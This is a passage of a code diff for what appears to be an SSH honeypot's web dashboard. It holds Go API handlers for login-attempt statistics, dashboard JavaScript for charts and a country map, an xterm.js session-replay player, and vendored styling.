points, err := s.store.GetAttemptsOverTime(ctx, days, since, until)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get attempts over time", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
resp := apiAttemptsOverTimeResponse{Points: make([]apiTimeSeriesPoint, len(points))}
|
||||||
|
for i, p := range points {
|
||||||
|
resp.Points[i] = apiTimeSeriesPoint{
|
||||||
|
Date: p.Timestamp.Format("2006-01-02"),
|
||||||
|
Count: p.Count,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
w.Header().Set("Content-Type", "application/json")
|
||||||
|
if err := json.NewEncoder(w).Encode(resp); err != nil {
|
||||||
|
s.logger.Error("failed to encode attempts over time", "err", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
type apiHourlyCount struct {
|
||||||
|
Hour int `json:"hour"`
|
||||||
|
Count int64 `json:"count"`
|
||||||
|
}
|
||||||
|
|
||||||
|
type apiHourlyPatternResponse struct {
|
||||||
|
Hours []apiHourlyCount `json:"hours"`
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *Server) handleAPIHourlyPattern(w http.ResponseWriter, r *http.Request) {
|
||||||
|
ctx, cancel := dbContext(r)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
since := parseDateParam(r, "since")
|
||||||
|
until := parseDateParam(r, "until")
|
||||||
|
|
||||||
|
counts, err := s.store.GetHourlyPattern(ctx, since, until)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get hourly pattern", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
resp := apiHourlyPatternResponse{Hours: make([]apiHourlyCount, len(counts))}
|
||||||
|
for i, c := range counts {
|
||||||
|
resp.Hours[i] = apiHourlyCount{Hour: c.Hour, Count: c.Count}
|
||||||
|
}
|
||||||
|
|
||||||
|
w.Header().Set("Content-Type", "application/json")
|
||||||
|
if err := json.NewEncoder(w).Encode(resp); err != nil {
|
||||||
|
s.logger.Error("failed to encode hourly pattern", "err", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
type apiCountryCount struct {
|
||||||
|
Country string `json:"country"`
|
||||||
|
Count int64 `json:"count"`
|
||||||
|
}
|
||||||
|
|
||||||
|
type apiCountryStatsResponse struct {
|
||||||
|
Countries []apiCountryCount `json:"countries"`
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *Server) handleAPICountryStats(w http.ResponseWriter, r *http.Request) {
|
||||||
|
ctx, cancel := dbContext(r)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
counts, err := s.store.GetCountryStats(ctx)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get country stats", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
resp := apiCountryStatsResponse{Countries: make([]apiCountryCount, len(counts))}
|
||||||
|
for i, c := range counts {
|
||||||
|
resp.Countries[i] = apiCountryCount{Country: c.Country, Count: c.Count}
|
||||||
|
}
|
||||||
|
|
||||||
|
w.Header().Set("Content-Type", "application/json")
|
||||||
|
if err := json.NewEncoder(w).Encode(resp); err != nil {
|
||||||
|
s.logger.Error("failed to encode country stats", "err", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *Server) handleFragmentDashboardContent(w http.ResponseWriter, r *http.Request) {
|
||||||
|
ctx, cancel := dbContext(r)
|
||||||
|
defer cancel()
|
||||||
|
f := parseDashboardFilter(r)
|
||||||
|
|
||||||
|
stats, err := s.store.GetFilteredDashboardStats(ctx, f)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get filtered stats", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
topUsernames, err := s.store.GetFilteredTopUsernames(ctx, 10, f)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get filtered top usernames", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
topPasswords, err := s.store.GetFilteredTopPasswords(ctx, 10, f)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get filtered top passwords", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
topIPs, err := s.store.GetFilteredTopIPs(ctx, 10, f)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get filtered top IPs", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
topCountries, err := s.store.GetFilteredTopCountries(ctx, 10, f)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get filtered top countries", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
data := dashboardData{
|
||||||
|
Stats: stats,
|
||||||
|
TopUsernames: topUsernames,
|
||||||
|
TopPasswords: topPasswords,
|
||||||
|
TopIPs: topIPs,
|
||||||
|
TopCountries: topCountries,
|
||||||
|
}
|
||||||
|
|
||||||
|
w.Header().Set("Content-Type", "text/html; charset=utf-8")
|
||||||
|
if err := s.tmpl.dashboard.ExecuteTemplate(w, "dashboard_content", data); err != nil {
|
||||||
|
s.logger.Error("failed to render dashboard content fragment", "err", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *Server) handleAPISessionEvents(w http.ResponseWriter, r *http.Request) {
|
||||||
|
ctx, cancel := dbContext(r)
|
||||||
|
defer cancel()
|
||||||
|
sessionID := r.PathValue("id")
|
||||||
|
|
||||||
|
events, err := s.store.GetSessionEvents(ctx, sessionID)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get session events", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
resp := apiEventsResponse{Events: make([]apiEvent, len(events))}
|
||||||
|
var baseTime int64
|
||||||
|
for i, e := range events {
|
||||||
|
ms := e.Timestamp.UnixMilli()
|
||||||
|
if i == 0 {
|
||||||
|
baseTime = ms
|
||||||
|
}
|
||||||
|
resp.Events[i] = apiEvent{
|
||||||
|
T: ms - baseTime,
|
||||||
|
D: e.Direction,
|
||||||
|
Data: base64.StdEncoding.EncodeToString(e.Data),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
w.Header().Set("Content-Type", "application/json")
|
||||||
|
if err := json.NewEncoder(w).Encode(resp); err != nil {
|
||||||
|
s.logger.Error("failed to encode session events", "err", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
14
internal/web/static/chart.min.js
vendored
Normal file
14
internal/web/static/chart.min.js
vendored
Normal file
File diff suppressed because one or more lines are too long
275
internal/web/static/dashboard.js
Normal file
275
internal/web/static/dashboard.js
Normal file
@@ -0,0 +1,275 @@
|
|||||||
|
(function() {
|
||||||
|
'use strict';
|
||||||
|
|
||||||
|
// Chart.js theme for Pico dark mode
|
||||||
|
Chart.defaults.color = '#b0b0b8';
|
||||||
|
Chart.defaults.borderColor = '#3a3a4a';
|
||||||
|
|
||||||
|
var attemptsChart = null;
|
||||||
|
var hourlyChart = null;
|
||||||
|
|
||||||
|
function getFilterParams() {
|
||||||
|
var form = document.getElementById('filter-form');
|
||||||
|
if (!form) return '';
|
||||||
|
var params = new URLSearchParams();
|
||||||
|
var since = form.elements['since'].value;
|
||||||
|
var until = form.elements['until'].value;
|
||||||
|
if (since) params.set('since', since);
|
||||||
|
if (until) params.set('until', until);
|
||||||
|
var humanScore = form.elements['human_score'];
|
||||||
|
if (humanScore && humanScore.checked) params.set('human_score', '1');
|
||||||
|
var sortBy = form.elements['sort'];
|
||||||
|
if (sortBy && sortBy.value) params.set('sort', sortBy.value);
|
||||||
|
return params.toString();
|
||||||
|
}
|
||||||
|
|
||||||
|
function initAttemptsChart() {
|
||||||
|
var canvas = document.getElementById('chart-attempts');
|
||||||
|
if (!canvas) return;
|
||||||
|
var ctx = canvas.getContext('2d');
|
||||||
|
|
||||||
|
var qs = getFilterParams();
|
||||||
|
var url = '/api/charts/attempts-over-time' + (qs ? '?' + qs : '');
|
||||||
|
|
||||||
|
fetch(url)
|
||||||
|
.then(function(r) { return r.json(); })
|
||||||
|
.then(function(data) {
|
||||||
|
var labels = data.points.map(function(p) { return p.date; });
|
||||||
|
var values = data.points.map(function(p) { return p.count; });
|
||||||
|
|
||||||
|
if (attemptsChart) {
|
||||||
|
attemptsChart.data.labels = labels;
|
||||||
|
attemptsChart.data.datasets[0].data = values;
|
||||||
|
attemptsChart.update();
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
attemptsChart = new Chart(ctx, {
|
||||||
|
type: 'line',
|
||||||
|
data: {
|
||||||
|
labels: labels,
|
||||||
|
datasets: [{
|
||||||
|
label: 'Attempts',
|
||||||
|
data: values,
|
||||||
|
borderColor: '#6366f1',
|
||||||
|
backgroundColor: 'rgba(99, 102, 241, 0.1)',
|
||||||
|
fill: true,
|
||||||
|
tension: 0.3,
|
||||||
|
pointRadius: 2
|
||||||
|
}]
|
||||||
|
},
|
||||||
|
options: {
|
||||||
|
responsive: true,
|
||||||
|
maintainAspectRatio: true,
|
||||||
|
plugins: { legend: { display: false } },
|
||||||
|
scales: {
|
||||||
|
x: { grid: { display: false } },
|
||||||
|
y: { beginAtZero: true }
|
||||||
|
}
|
||||||
|
}
|
||||||
|
});
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
function initHourlyChart() {
|
||||||
|
var canvas = document.getElementById('chart-hourly');
|
||||||
|
if (!canvas) return;
|
||||||
|
var ctx = canvas.getContext('2d');
|
||||||
|
|
||||||
|
var qs = getFilterParams();
|
||||||
|
var url = '/api/charts/hourly-pattern' + (qs ? '?' + qs : '');
|
||||||
|
|
||||||
|
fetch(url)
|
||||||
|
.then(function(r) { return r.json(); })
|
||||||
|
.then(function(data) {
|
||||||
|
// Fill all 24 hours, defaulting to 0
|
||||||
|
var hourMap = {};
|
||||||
|
data.hours.forEach(function(h) { hourMap[h.hour] = h.count; });
|
||||||
|
var labels = [];
|
||||||
|
var values = [];
|
||||||
|
for (var i = 0; i < 24; i++) {
|
||||||
|
labels.push(i + ':00');
|
||||||
|
values.push(hourMap[i] || 0);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (hourlyChart) {
|
||||||
|
hourlyChart.data.labels = labels;
|
||||||
|
hourlyChart.data.datasets[0].data = values;
|
||||||
|
hourlyChart.update();
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
hourlyChart = new Chart(ctx, {
|
||||||
|
type: 'bar',
|
||||||
|
data: {
|
||||||
|
labels: labels,
|
||||||
|
datasets: [{
|
||||||
|
label: 'Attempts',
|
||||||
|
data: values,
|
||||||
|
backgroundColor: 'rgba(99, 102, 241, 0.6)',
|
||||||
|
borderColor: '#6366f1',
|
||||||
|
borderWidth: 1
|
||||||
|
}]
|
||||||
|
},
|
||||||
|
options: {
|
||||||
|
responsive: true,
|
||||||
|
maintainAspectRatio: true,
|
||||||
|
plugins: { legend: { display: false } },
|
||||||
|
scales: {
|
||||||
|
x: { grid: { display: false } },
|
||||||
|
y: { beginAtZero: true }
|
||||||
|
}
|
||||||
|
}
|
||||||
|
});
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
function initWorldMap() {
|
||||||
|
var container = document.getElementById('world-map');
|
||||||
|
if (!container) return;
|
||||||
|
|
||||||
|
fetch('/static/world.svg')
|
||||||
|
.then(function(r) { return r.text(); })
|
||||||
|
.then(function(svgText) {
|
||||||
|
container.innerHTML = svgText;
|
||||||
|
|
||||||
|
fetch('/api/charts/country-stats')
|
||||||
|
.then(function(r) { return r.json(); })
|
||||||
|
.then(function(data) {
|
||||||
|
colorMap(container, data.countries);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
function colorMap(container, countries) {
|
||||||
|
if (!countries || countries.length === 0) return;
|
||||||
|
|
||||||
|
var maxCount = countries[0].count; // already sorted DESC
|
||||||
|
var logMax = Math.log(maxCount + 1);
|
||||||
|
|
||||||
|
// Build lookup
|
||||||
|
var lookup = {};
|
||||||
|
countries.forEach(function(c) {
|
||||||
|
lookup[c.country.toLowerCase()] = c.count;
|
||||||
|
});
|
||||||
|
|
||||||
|
// Create tooltip element
|
||||||
|
var tooltip = document.createElement('div');
|
||||||
|
tooltip.id = 'map-tooltip';
|
||||||
|
tooltip.style.cssText = 'position:fixed;display:none;background:#1a1a2e;color:#e0e0e8;padding:4px 8px;border-radius:4px;font-size:13px;pointer-events:none;z-index:1000;border:1px solid #3a3a4a;';
|
||||||
|
document.body.appendChild(tooltip);
|
||||||
|
|
||||||
|
var svg = container.querySelector('svg');
|
||||||
|
if (!svg) return;
|
||||||
|
|
||||||
|
// Remove SVG title to prevent browser native tooltip
|
||||||
|
var svgTitle = svg.querySelector('title');
|
||||||
|
if (svgTitle) svgTitle.remove();
|
||||||
|
|
||||||
|
// Select both <path id="xx"> and <g id="xx"> country elements
|
||||||
|
var elements = svg.querySelectorAll('path[id], g[id]');
|
||||||
|
elements.forEach(function(el) {
|
||||||
|
var id = el.id.toLowerCase();
|
||||||
|
if (id.charAt(0) === '_') return; // skip non-country paths
|
||||||
|
|
||||||
|
var count = lookup[id];
|
||||||
|
if (count) {
|
||||||
|
var intensity = Math.log(count + 1) / logMax;
|
||||||
|
var r = Math.round(30 + intensity * 69); // 30 -> 99
|
||||||
|
var g = Math.round(30 + intensity * 72); // 30 -> 102
|
||||||
|
var b = Math.round(62 + intensity * 179); // 62 -> 241
|
||||||
|
var color = 'rgb(' + r + ',' + g + ',' + b + ')';
|
||||||
|
// For <g> elements, color child paths; for <path>, color directly
|
||||||
|
if (el.tagName.toLowerCase() === 'g') {
|
||||||
|
el.querySelectorAll('path').forEach(function(p) {
|
||||||
|
p.style.fill = color;
|
||||||
|
});
|
||||||
|
} else {
|
||||||
|
el.style.fill = color;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
el.addEventListener('mouseenter', function(e) {
|
||||||
|
var cc = id.toUpperCase();
|
||||||
|
var n = lookup[id] || 0;
|
||||||
|
tooltip.textContent = cc + ': ' + n.toLocaleString() + ' attempts';
|
||||||
|
tooltip.style.display = 'block';
|
||||||
|
});
|
||||||
|
|
||||||
|
el.addEventListener('mousemove', function(e) {
|
||||||
|
tooltip.style.left = (e.clientX + 12) + 'px';
|
||||||
|
tooltip.style.top = (e.clientY - 10) + 'px';
|
||||||
|
});
|
||||||
|
|
||||||
|
el.addEventListener('mouseleave', function() {
|
||||||
|
tooltip.style.display = 'none';
|
||||||
|
});
|
||||||
|
|
||||||
|
el.addEventListener('click', function() {
|
||||||
|
var input = document.querySelector('#filter-form input[name="country"]');
|
||||||
|
if (input) {
|
||||||
|
input.value = id.toUpperCase();
|
||||||
|
applyFilters();
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
el.style.cursor = 'pointer';
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
function applyFilters() {
|
||||||
|
// Re-fetch charts with filter params
|
||||||
|
initAttemptsChart();
|
||||||
|
initHourlyChart();
|
||||||
|
|
||||||
|
// Re-fetch dashboard content via htmx
|
||||||
|
var form = document.getElementById('filter-form');
|
||||||
|
if (!form) return;
|
||||||
|
|
||||||
|
var params = new URLSearchParams();
|
||||||
|
['since', 'until', 'ip', 'country', 'username'].forEach(function(name) {
|
||||||
|
var val = form.elements[name].value;
|
||||||
|
if (val) params.set(name, val);
|
||||||
|
});
|
||||||
|
|
||||||
|
var humanScore = form.elements['human_score'];
|
||||||
|
if (humanScore && humanScore.checked) params.set('human_score', '1');
|
||||||
|
var sortBy = form.elements['sort'];
|
||||||
|
if (sortBy && sortBy.value) params.set('sort', sortBy.value);
|
||||||
|
|
||||||
|
var target = document.getElementById('dashboard-content');
|
||||||
|
if (target) {
|
||||||
|
var url = '/fragments/dashboard-content?' + params.toString();
|
||||||
|
htmx.ajax('GET', url, {target: '#dashboard-content', swap: 'innerHTML'});
|
||||||
|
}
|
||||||
|
|
||||||
|
// Server-side filter for recent sessions table
|
||||||
|
var sessionsUrl = '/fragments/recent-sessions?' + params.toString();
|
||||||
|
htmx.ajax('GET', sessionsUrl, {target: '#recent-sessions-table tbody', swap: 'innerHTML'});
|
||||||
|
}
|
||||||
|
|
||||||
|
window.clearFilters = function() {
|
||||||
|
var form = document.getElementById('filter-form');
|
||||||
|
if (form) {
|
||||||
|
form.reset();
|
||||||
|
applyFilters();
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
window.applyFilters = applyFilters;
|
||||||
|
|
||||||
|
// Initialize on DOM ready
|
||||||
|
document.addEventListener('DOMContentLoaded', function() {
|
||||||
|
initAttemptsChart();
|
||||||
|
initHourlyChart();
|
||||||
|
initWorldMap();
|
||||||
|
|
||||||
|
var form = document.getElementById('filter-form');
|
||||||
|
if (form) {
|
||||||
|
form.addEventListener('submit', function(e) {
|
||||||
|
e.preventDefault();
|
||||||
|
applyFilters();
|
||||||
|
});
|
||||||
|
}
|
||||||
|
});
|
||||||
|
})();
|
||||||
1
internal/web/static/htmx.min.js
vendored
Normal file
1
internal/web/static/htmx.min.js
vendored
Normal file
File diff suppressed because one or more lines are too long
4
internal/web/static/pico.min.css
vendored
Normal file
4
internal/web/static/pico.min.css
vendored
Normal file
File diff suppressed because one or more lines are too long
83
internal/web/static/replay.js
Normal file
83
internal/web/static/replay.js
Normal file
@@ -0,0 +1,83 @@
|
|||||||
|
// ReplayPlayer drives xterm.js playback of recorded session events.
|
||||||
|
function ReplayPlayer(containerId, sessionId) {
|
||||||
|
this.terminal = new Terminal({
|
||||||
|
cols: 80,
|
||||||
|
rows: 24,
|
||||||
|
convertEol: true,
|
||||||
|
disableStdin: true,
|
||||||
|
theme: {
|
||||||
|
background: '#000000',
|
||||||
|
foreground: '#ffffff'
|
||||||
|
}
|
||||||
|
});
|
||||||
|
this.terminal.open(document.getElementById(containerId));
|
||||||
|
|
||||||
|
this.sessionId = sessionId;
|
||||||
|
this.events = [];
|
||||||
|
this.index = 0;
|
||||||
|
this.speed = 1;
|
||||||
|
this.timers = [];
|
||||||
|
this.playing = false;
|
||||||
|
|
||||||
|
// Fetch events immediately.
|
||||||
|
var self = this;
|
||||||
|
fetch('/api/sessions/' + sessionId + '/events')
|
||||||
|
.then(function(r) { return r.json(); })
|
||||||
|
.then(function(data) {
|
||||||
|
self.events = data.events || [];
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
ReplayPlayer.prototype.play = function() {
|
||||||
|
if (this.playing) return;
|
||||||
|
if (this.events.length === 0) return;
|
||||||
|
this.playing = true;
|
||||||
|
this._schedule();
|
||||||
|
};
|
||||||
|
|
||||||
|
ReplayPlayer.prototype.pause = function() {
|
||||||
|
this.playing = false;
|
||||||
|
for (var i = 0; i < this.timers.length; i++) {
|
||||||
|
clearTimeout(this.timers[i]);
|
||||||
|
}
|
||||||
|
this.timers = [];
|
||||||
|
};
|
||||||
|
|
||||||
|
ReplayPlayer.prototype.reset = function() {
|
||||||
|
this.pause();
|
||||||
|
this.index = 0;
|
||||||
|
this.terminal.reset();
|
||||||
|
};
|
||||||
|
|
||||||
|
ReplayPlayer.prototype.setSpeed = function(speed) {
|
||||||
|
this.speed = speed;
|
||||||
|
if (this.playing) {
|
||||||
|
this.pause();
|
||||||
|
this.play();
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
ReplayPlayer.prototype._schedule = function() {
|
||||||
|
var self = this;
|
||||||
|
var baseT = this.index < this.events.length ? this.events[this.index].t : 0;
|
||||||
|
|
||||||
|
for (var i = this.index; i < this.events.length; i++) {
|
||||||
|
(function(idx) {
|
||||||
|
var evt = self.events[idx];
|
||||||
|
var delay = (evt.t - baseT) / self.speed;
|
||||||
|
var timer = setTimeout(function() {
|
||||||
|
if (!self.playing) return;
|
||||||
|
// Only write output events (d=1) to terminal; input is echoed in output.
|
||||||
|
if (evt.d === 1) {
|
||||||
|
var raw = atob(evt.data);
|
||||||
|
self.terminal.write(raw);
|
||||||
|
}
|
||||||
|
self.index = idx + 1;
|
||||||
|
if (self.index >= self.events.length) {
|
||||||
|
self.playing = false;
|
||||||
|
}
|
||||||
|
}, delay);
|
||||||
|
self.timers.push(timer);
|
||||||
|
})(i);
|
||||||
|
}
|
||||||
|
};
|
||||||
1
internal/web/static/world.svg
Normal file
1
internal/web/static/world.svg
Normal file
File diff suppressed because one or more lines are too long
|
After Width: | Height: | Size: 55 KiB |
209
internal/web/static/xterm.css
Normal file
209
internal/web/static/xterm.css
Normal file
@@ -0,0 +1,209 @@
|
|||||||
|
/**
|
||||||
|
* Copyright (c) 2014 The xterm.js authors. All rights reserved.
|
||||||
|
* Copyright (c) 2012-2013, Christopher Jeffrey (MIT License)
|
||||||
|
* https://github.com/chjj/term.js
|
||||||
|
* @license MIT
|
||||||
|
*
|
||||||
|
* Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||||
|
* of this software and associated documentation files (the "Software"), to deal
|
||||||
|
* in the Software without restriction, including without limitation the rights
|
||||||
|
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||||
|
* copies of the Software, and to permit persons to whom the Software is
|
||||||
|
* furnished to do so, subject to the following conditions:
|
||||||
|
*
|
||||||
|
* The above copyright notice and this permission notice shall be included in
|
||||||
|
* all copies or substantial portions of the Software.
|
||||||
|
*
|
||||||
|
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||||
|
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||||
|
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||||
|
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||||
|
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||||
|
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
||||||
|
* THE SOFTWARE.
|
||||||
|
*
|
||||||
|
* Originally forked from (with the author's permission):
|
||||||
|
* Fabrice Bellard's javascript vt100 for jslinux:
|
||||||
|
* http://bellard.org/jslinux/
|
||||||
|
* Copyright (c) 2011 Fabrice Bellard
|
||||||
|
* The original design remains. The terminal itself
|
||||||
|
* has been extended to include xterm CSI codes, among
|
||||||
|
* other features.
|
||||||
|
*/
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Default styles for xterm.js
|
||||||
|
*/
|
||||||
|
|
||||||
|
.xterm {
|
||||||
|
cursor: text;
|
||||||
|
position: relative;
|
||||||
|
user-select: none;
|
||||||
|
-ms-user-select: none;
|
||||||
|
-webkit-user-select: none;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm.focus,
|
||||||
|
.xterm:focus {
|
||||||
|
outline: none;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm .xterm-helpers {
|
||||||
|
position: absolute;
|
||||||
|
top: 0;
|
||||||
|
/**
|
||||||
|
* The z-index of the helpers must be higher than the canvases in order for
|
||||||
|
* IMEs to appear on top.
|
||||||
|
*/
|
||||||
|
z-index: 5;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm .xterm-helper-textarea {
|
||||||
|
padding: 0;
|
||||||
|
border: 0;
|
||||||
|
margin: 0;
|
||||||
|
/* Move textarea out of the screen to the far left, so that the cursor is not visible */
|
||||||
|
position: absolute;
|
||||||
|
opacity: 0;
|
||||||
|
left: -9999em;
|
||||||
|
top: 0;
|
||||||
|
width: 0;
|
||||||
|
height: 0;
|
||||||
|
z-index: -5;
|
||||||
|
/** Prevent wrapping so the IME appears against the textarea at the correct position */
|
||||||
|
white-space: nowrap;
|
||||||
|
overflow: hidden;
|
||||||
|
resize: none;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm .composition-view {
|
||||||
|
/* TODO: Composition position got messed up somewhere */
|
||||||
|
background: #000;
|
||||||
|
color: #FFF;
|
||||||
|
display: none;
|
||||||
|
position: absolute;
|
||||||
|
white-space: nowrap;
|
||||||
|
z-index: 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm .composition-view.active {
|
||||||
|
display: block;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm .xterm-viewport {
|
||||||
|
/* On OS X this is required in order for the scroll bar to appear fully opaque */
|
||||||
|
background-color: #000;
|
||||||
|
overflow-y: scroll;
|
||||||
|
cursor: default;
|
||||||
|
position: absolute;
|
||||||
|
right: 0;
|
||||||
|
left: 0;
|
||||||
|
top: 0;
|
||||||
|
bottom: 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm .xterm-screen {
|
||||||
|
position: relative;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm .xterm-screen canvas {
|
||||||
|
position: absolute;
|
||||||
|
left: 0;
|
||||||
|
top: 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm .xterm-scroll-area {
|
||||||
|
visibility: hidden;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm-char-measure-element {
|
||||||
|
display: inline-block;
|
||||||
|
visibility: hidden;
|
||||||
|
position: absolute;
|
||||||
|
top: 0;
|
||||||
|
left: -9999em;
|
||||||
|
line-height: normal;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm.enable-mouse-events {
|
||||||
|
/* When mouse events are enabled (eg. tmux), revert to the standard pointer cursor */
|
||||||
|
cursor: default;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm.xterm-cursor-pointer,
|
||||||
|
.xterm .xterm-cursor-pointer {
|
||||||
|
cursor: pointer;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm.column-select.focus {
|
||||||
|
/* Column selection mode */
|
||||||
|
cursor: crosshair;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm .xterm-accessibility,
|
||||||
|
.xterm .xterm-message {
|
||||||
|
position: absolute;
|
||||||
|
left: 0;
|
||||||
|
top: 0;
|
||||||
|
bottom: 0;
|
||||||
|
right: 0;
|
||||||
|
z-index: 10;
|
||||||
|
color: transparent;
|
||||||
|
pointer-events: none;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm .live-region {
|
||||||
|
position: absolute;
|
||||||
|
left: -9999px;
|
||||||
|
width: 1px;
|
||||||
|
height: 1px;
|
||||||
|
overflow: hidden;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm-dim {
|
||||||
|
/* Dim should not apply to background, so the opacity of the foreground color is applied
|
||||||
|
* explicitly in the generated class and reset to 1 here */
|
||||||
|
opacity: 1 !important;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm-underline-1 { text-decoration: underline; }
|
||||||
|
.xterm-underline-2 { text-decoration: double underline; }
|
||||||
|
.xterm-underline-3 { text-decoration: wavy underline; }
|
||||||
|
.xterm-underline-4 { text-decoration: dotted underline; }
|
||||||
|
.xterm-underline-5 { text-decoration: dashed underline; }
|
||||||
|
|
||||||
|
.xterm-overline {
|
||||||
|
text-decoration: overline;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm-overline.xterm-underline-1 { text-decoration: overline underline; }
|
||||||
|
.xterm-overline.xterm-underline-2 { text-decoration: overline double underline; }
|
||||||
|
.xterm-overline.xterm-underline-3 { text-decoration: overline wavy underline; }
|
||||||
|
.xterm-overline.xterm-underline-4 { text-decoration: overline dotted underline; }
|
||||||
|
.xterm-overline.xterm-underline-5 { text-decoration: overline dashed underline; }
|
||||||
|
|
||||||
|
.xterm-strikethrough {
|
||||||
|
text-decoration: line-through;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm-screen .xterm-decoration-container .xterm-decoration {
|
||||||
|
z-index: 6;
|
||||||
|
position: absolute;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm-screen .xterm-decoration-container .xterm-decoration.xterm-decoration-top-layer {
|
||||||
|
z-index: 7;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm-decoration-overview-ruler {
|
||||||
|
z-index: 8;
|
||||||
|
position: absolute;
|
||||||
|
top: 0;
|
||||||
|
right: 0;
|
||||||
|
pointer-events: none;
|
||||||
|
}
|
||||||
|
|
||||||
|
.xterm-decoration-top {
|
||||||
|
z-index: 2;
|
||||||
|
position: relative;
|
||||||
|
}
|
||||||
8
internal/web/static/xterm.min.js
vendored
Normal file
8
internal/web/static/xterm.min.js
vendored
Normal file
File diff suppressed because one or more lines are too long
102
internal/web/templates.go
Normal file
102
internal/web/templates.go
Normal file
@@ -0,0 +1,102 @@
|
|||||||
|
package web
|
||||||
|
|
||||||
|
import (
|
||||||
|
"embed"
|
||||||
|
"fmt"
|
||||||
|
"html/template"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
//go:embed templates/*.html templates/fragments/*.html
|
||||||
|
var templateFS embed.FS
|
||||||
|
|
||||||
|
type templateSet struct {
|
||||||
|
dashboard *template.Template
|
||||||
|
sessionDetail *template.Template
|
||||||
|
}
|
||||||
|
